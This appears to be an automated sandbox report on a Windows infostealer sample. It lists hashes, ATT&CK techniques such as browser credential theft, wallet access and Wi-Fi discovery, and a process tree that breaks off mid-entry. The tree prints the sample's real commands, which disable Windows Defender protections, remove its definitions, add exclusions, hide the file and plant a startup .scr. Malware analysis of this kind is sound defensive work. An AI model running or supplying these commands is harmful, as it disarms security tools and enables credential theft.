92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-12-2024 22:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
Size

8.0MB
MD5

fdc20375175f188c14edb1ccc7162d0c
SHA1

14071aea7d464a94a1034fd2107816a0624d045d
SHA256

92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3
SHA512

c41ba6706293d2bf0001631f60f1695e75f61d7d1a050be9fe93c7568636efa89c85dad9fa9c28af17e4af929e57c9eade8cb3c5f8bb2087a7531822a9743b4f
SSDEEP

196608:pyYShE1V3oOshoKMuIkhVastRL5Di3ug1DVNh2:oYSy1V3oOshouIkPftRL54z3Nh2

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1220	powershell.exe
1236	powershell.exe
400	powershell.exe
1492	powershell.exe
5104	powershell.exe
1016	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3756	cmd.exe
1048	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4204	bound.exe
4416	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4920	tasklist.exe
4432	tasklist.exe
4808	tasklist.exe
4612	tasklist.exe
4016	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2288	cmd.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b84-22.dat	upx
behavioral2/memory/4608-26-0x00007FFF56FA0000-0x00007FFF57589000-memory.dmp	upx
behavioral2/files/0x000a000000023b76-28.dat	upx
behavioral2/files/0x000a000000023b82-32.dat	upx
behavioral2/memory/4608-50-0x00007FFF5D260000-0x00007FFF5D26F000-memory.dmp	upx
behavioral2/files/0x000a000000023b7d-49.dat	upx
behavioral2/files/0x000a000000023b7c-48.dat	upx
behavioral2/files/0x000a000000023b7b-47.dat	upx
behavioral2/files/0x000a000000023b7a-46.dat	upx
behavioral2/files/0x000a000000023b79-45.dat	upx
behavioral2/files/0x000a000000023b78-44.dat	upx
behavioral2/files/0x000a000000023b77-43.dat	upx
behavioral2/files/0x0031000000023b75-42.dat	upx
behavioral2/files/0x000a000000023b89-41.dat	upx
behavioral2/files/0x000a000000023b88-40.dat	upx
behavioral2/files/0x000a000000023b87-39.dat	upx
behavioral2/files/0x000a000000023b83-36.dat	upx
behavioral2/files/0x000a000000023b81-35.dat	upx
behavioral2/memory/4608-31-0x00007FFF5B880000-0x00007FFF5B8A3000-memory.dmp	upx
behavioral2/memory/4608-56-0x00007FFF5B850000-0x00007FFF5B87D000-memory.dmp	upx
behavioral2/memory/4608-58-0x00007FFF5B830000-0x00007FFF5B849000-memory.dmp	upx
behavioral2/memory/4608-60-0x00007FFF5B7A0000-0x00007FFF5B7C3000-memory.dmp	upx
behavioral2/memory/4608-62-0x00007FFF48CA0000-0x00007FFF48E17000-memory.dmp	upx
behavioral2/memory/4608-64-0x00007FFF5B730000-0x00007FFF5B749000-memory.dmp	upx
behavioral2/memory/4608-66-0x00007FFF5D250000-0x00007FFF5D25D000-memory.dmp	upx
behavioral2/memory/4608-68-0x00007FFF58060000-0x00007FFF58093000-memory.dmp	upx
behavioral2/memory/4608-73-0x00007FFF57F90000-0x00007FFF5805D000-memory.dmp	upx
behavioral2/memory/4608-76-0x00007FFF5B880000-0x00007FFF5B8A3000-memory.dmp	upx
behavioral2/memory/4608-75-0x00007FFF48780000-0x00007FFF48CA0000-memory.dmp	upx
behavioral2/memory/4608-72-0x00007FFF56FA0000-0x00007FFF57589000-memory.dmp	upx
behavioral2/memory/4608-78-0x00007FFF5B710000-0x00007FFF5B724000-memory.dmp	upx
behavioral2/memory/4608-80-0x00007FFF5B850000-0x00007FFF5B87D000-memory.dmp	upx
behavioral2/memory/4608-81-0x00007FFF5BA30000-0x00007FFF5BA3D000-memory.dmp	upx
behavioral2/memory/4608-85-0x00007FFF57770000-0x00007FFF5788C000-memory.dmp	upx
behavioral2/memory/4608-84-0x00007FFF5B830000-0x00007FFF5B849000-memory.dmp	upx
behavioral2/memory/4608-86-0x00007FFF5B7A0000-0x00007FFF5B7C3000-memory.dmp	upx
behavioral2/memory/4608-88-0x00007FFF48CA0000-0x00007FFF48E17000-memory.dmp	upx
behavioral2/memory/4608-92-0x00007FFF5B730000-0x00007FFF5B749000-memory.dmp	upx
behavioral2/memory/4608-186-0x00007FFF58060000-0x00007FFF58093000-memory.dmp	upx
behavioral2/memory/4608-260-0x00007FFF57F90000-0x00007FFF5805D000-memory.dmp	upx
behavioral2/memory/4608-290-0x00007FFF48780000-0x00007FFF48CA0000-memory.dmp	upx
behavioral2/memory/4608-293-0x00007FFF5B710000-0x00007FFF5B724000-memory.dmp	upx
behavioral2/memory/4608-324-0x00007FFF57770000-0x00007FFF5788C000-memory.dmp	upx
behavioral2/memory/4608-326-0x00007FFF5B880000-0x00007FFF5B8A3000-memory.dmp	upx
behavioral2/memory/4608-334-0x00007FFF58060000-0x00007FFF58093000-memory.dmp	upx
behavioral2/memory/4608-331-0x00007FFF48CA0000-0x00007FFF48E17000-memory.dmp	upx
behavioral2/memory/4608-325-0x00007FFF56FA0000-0x00007FFF57589000-memory.dmp	upx
behavioral2/memory/4608-353-0x00007FFF5BA30000-0x00007FFF5BA3D000-memory.dmp	upx
behavioral2/memory/4608-354-0x00007FFF57770000-0x00007FFF5788C000-memory.dmp	upx
behavioral2/memory/4608-360-0x00007FFF5B7A0000-0x00007FFF5B7C3000-memory.dmp	upx
behavioral2/memory/4608-359-0x00007FFF5B830000-0x00007FFF5B849000-memory.dmp	upx
behavioral2/memory/4608-358-0x00007FFF5B850000-0x00007FFF5B87D000-memory.dmp	upx
behavioral2/memory/4608-357-0x00007FFF5D260000-0x00007FFF5D26F000-memory.dmp	upx
behavioral2/memory/4608-356-0x00007FFF5B880000-0x00007FFF5B8A3000-memory.dmp	upx
behavioral2/memory/4608-355-0x00007FFF48780000-0x00007FFF48CA0000-memory.dmp	upx
behavioral2/memory/4608-350-0x00007FFF57F90000-0x00007FFF5805D000-memory.dmp	upx
behavioral2/memory/4608-349-0x00007FFF58060000-0x00007FFF58093000-memory.dmp	upx
behavioral2/memory/4608-348-0x00007FFF5D250000-0x00007FFF5D25D000-memory.dmp	upx
behavioral2/memory/4608-347-0x00007FFF5B730000-0x00007FFF5B749000-memory.dmp	upx
behavioral2/memory/4608-346-0x00007FFF48CA0000-0x00007FFF48E17000-memory.dmp	upx
behavioral2/memory/4608-340-0x00007FFF56FA0000-0x00007FFF57589000-memory.dmp	upx
behavioral2/memory/4608-352-0x00007FFF5B710000-0x00007FFF5B724000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
224	cmd.exe
2084	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1672	cmd.exe
2124	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2784	WMIC.exe
3916	WMIC.exe
1420	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
624	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2084	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1492	powershell.exe
5104	powershell.exe
1220	powershell.exe
1220	powershell.exe
5104	powershell.exe
5104	powershell.exe
1492	powershell.exe
1492	powershell.exe
1220	powershell.exe
1016	powershell.exe
1016	powershell.exe
1048	powershell.exe
1048	powershell.exe
1048	powershell.exe
536	powershell.exe
536	powershell.exe
536	powershell.exe
1236	powershell.exe
1236	powershell.exe
3588	powershell.exe
3588	powershell.exe
400	powershell.exe
400	powershell.exe
2788	powershell.exe
2788	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeIncreaseQuotaPrivilege	5016	WMIC.exe
Token: SeSecurityPrivilege	5016	WMIC.exe
Token: SeTakeOwnershipPrivilege	5016	WMIC.exe
Token: SeLoadDriverPrivilege	5016	WMIC.exe
Token: SeSystemProfilePrivilege	5016	WMIC.exe
Token: SeSystemtimePrivilege	5016	WMIC.exe
Token: SeProfSingleProcessPrivilege	5016	WMIC.exe
Token: SeIncBasePriorityPrivilege	5016	WMIC.exe
Token: SeCreatePagefilePrivilege	5016	WMIC.exe
Token: SeBackupPrivilege	5016	WMIC.exe
Token: SeRestorePrivilege	5016	WMIC.exe
Token: SeShutdownPrivilege	5016	WMIC.exe
Token: SeDebugPrivilege	5016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5016	WMIC.exe
Token: SeRemoteShutdownPrivilege	5016	WMIC.exe
Token: SeUndockPrivilege	5016	WMIC.exe
Token: SeManageVolumePrivilege	5016	WMIC.exe
Token: 33	5016	WMIC.exe
Token: 34	5016	WMIC.exe
Token: 35	5016	WMIC.exe
Token: 36	5016	WMIC.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	4920	tasklist.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeIncreaseQuotaPrivilege	5016	WMIC.exe
Token: SeSecurityPrivilege	5016	WMIC.exe
Token: SeTakeOwnershipPrivilege	5016	WMIC.exe
Token: SeLoadDriverPrivilege	5016	WMIC.exe
Token: SeSystemProfilePrivilege	5016	WMIC.exe
Token: SeSystemtimePrivilege	5016	WMIC.exe
Token: SeProfSingleProcessPrivilege	5016	WMIC.exe
Token: SeIncBasePriorityPrivilege	5016	WMIC.exe
Token: SeCreatePagefilePrivilege	5016	WMIC.exe
Token: SeBackupPrivilege	5016	WMIC.exe
Token: SeRestorePrivilege	5016	WMIC.exe
Token: SeShutdownPrivilege	5016	WMIC.exe
Token: SeDebugPrivilege	5016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5016	WMIC.exe
Token: SeRemoteShutdownPrivilege	5016	WMIC.exe
Token: SeUndockPrivilege	5016	WMIC.exe
Token: SeManageVolumePrivilege	5016	WMIC.exe
Token: 33	5016	WMIC.exe
Token: 34	5016	WMIC.exe
Token: 35	5016	WMIC.exe
Token: 36	5016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1420	WMIC.exe
Token: SeSecurityPrivilege	1420	WMIC.exe
Token: SeTakeOwnershipPrivilege	1420	WMIC.exe
Token: SeLoadDriverPrivilege	1420	WMIC.exe
Token: SeSystemProfilePrivilege	1420	WMIC.exe
Token: SeSystemtimePrivilege	1420	WMIC.exe
Token: SeProfSingleProcessPrivilege	1420	WMIC.exe
Token: SeIncBasePriorityPrivilege	1420	WMIC.exe
Token: SeCreatePagefilePrivilege	1420	WMIC.exe
Token: SeBackupPrivilege	1420	WMIC.exe
Token: SeRestorePrivilege	1420	WMIC.exe
Token: SeShutdownPrivilege	1420	WMIC.exe
Token: SeDebugPrivilege	1420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1420	WMIC.exe
Token: SeRemoteShutdownPrivilege	1420	WMIC.exe
Token: SeUndockPrivilege	1420	WMIC.exe
Token: SeManageVolumePrivilege	1420	WMIC.exe
Token: 33	1420	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4448 wrote to memory of 4608	4448	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	82
PID 4448 wrote to memory of 4608	4448	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	82
PID 4608 wrote to memory of 1472	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	83
PID 4608 wrote to memory of 1472	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	83
PID 4608 wrote to memory of 2816	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	84
PID 4608 wrote to memory of 2816	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	84
PID 4608 wrote to memory of 4928	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	87
PID 4608 wrote to memory of 4928	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	87
PID 4608 wrote to memory of 3756	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	88
PID 4608 wrote to memory of 3756	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	88
PID 4608 wrote to memory of 2744	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	89
PID 4608 wrote to memory of 2744	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	89
PID 4608 wrote to memory of 4716	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	93
PID 4608 wrote to memory of 4716	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	93
PID 1472 wrote to memory of 1492	1472	cmd.exe	95
PID 1472 wrote to memory of 1492	1472	cmd.exe	95
PID 3756 wrote to memory of 4204	3756	cmd.exe	96
PID 3756 wrote to memory of 4204	3756	cmd.exe	96
PID 2816 wrote to memory of 1220	2816	cmd.exe	98
PID 2816 wrote to memory of 1220	2816	cmd.exe	98
PID 4928 wrote to memory of 5104	4928	cmd.exe	99
PID 4928 wrote to memory of 5104	4928	cmd.exe	99
PID 4716 wrote to memory of 5016	4716	cmd.exe	100
PID 4716 wrote to memory of 5016	4716	cmd.exe	100
PID 2744 wrote to memory of 4920	2744	cmd.exe	101
PID 2744 wrote to memory of 4920	2744	cmd.exe	101
PID 4608 wrote to memory of 4876	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	103
PID 4608 wrote to memory of 4876	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	103
PID 4876 wrote to memory of 924	4876	cmd.exe	105
PID 4876 wrote to memory of 924	4876	cmd.exe	105
PID 4608 wrote to memory of 2884	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	106
PID 4608 wrote to memory of 2884	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	106
PID 2884 wrote to memory of 620	2884	cmd.exe	108
PID 2884 wrote to memory of 620	2884	cmd.exe	108
PID 4608 wrote to memory of 896	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	109
PID 4608 wrote to memory of 896	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	109
PID 896 wrote to memory of 1420	896	cmd.exe	111
PID 896 wrote to memory of 1420	896	cmd.exe	111
PID 4608 wrote to memory of 2540	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	112
PID 4608 wrote to memory of 2540	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	112
PID 2540 wrote to memory of 2784	2540	cmd.exe	114
PID 2540 wrote to memory of 2784	2540	cmd.exe	114
PID 4608 wrote to memory of 2288	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	115
PID 4608 wrote to memory of 2288	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	115
PID 4608 wrote to memory of 3656	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	163
PID 4608 wrote to memory of 3656	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	163
PID 2288 wrote to memory of 4484	2288	cmd.exe	119
PID 2288 wrote to memory of 4484	2288	cmd.exe	119
PID 3656 wrote to memory of 1016	3656	cmd.exe	120
PID 3656 wrote to memory of 1016	3656	cmd.exe	120
PID 4608 wrote to memory of 4816	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	121
PID 4608 wrote to memory of 4816	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	121
PID 4608 wrote to memory of 2240	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	122
PID 4608 wrote to memory of 2240	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	122
PID 4816 wrote to memory of 4432	4816	cmd.exe	126
PID 2240 wrote to memory of 4808	2240	cmd.exe	125
PID 4816 wrote to memory of 4432	4816	cmd.exe	126
PID 2240 wrote to memory of 4808	2240	cmd.exe	125
PID 4608 wrote to memory of 2408	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	127
PID 4608 wrote to memory of 2408	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	127
PID 4608 wrote to memory of 3756	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	128
PID 4608 wrote to memory of 3756	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	128
PID 4608 wrote to memory of 1652	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	131
PID 4608 wrote to memory of 1652	4608	92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4484	attrib.exe
1444	attrib.exe
1140	attrib.exe

C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
"C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4448
- C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe
  "C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3756
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4876
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe"
      4⤵
      Views/modifies file attributes
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‎.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4432
- - C:\Windows\system32\cmd.exe
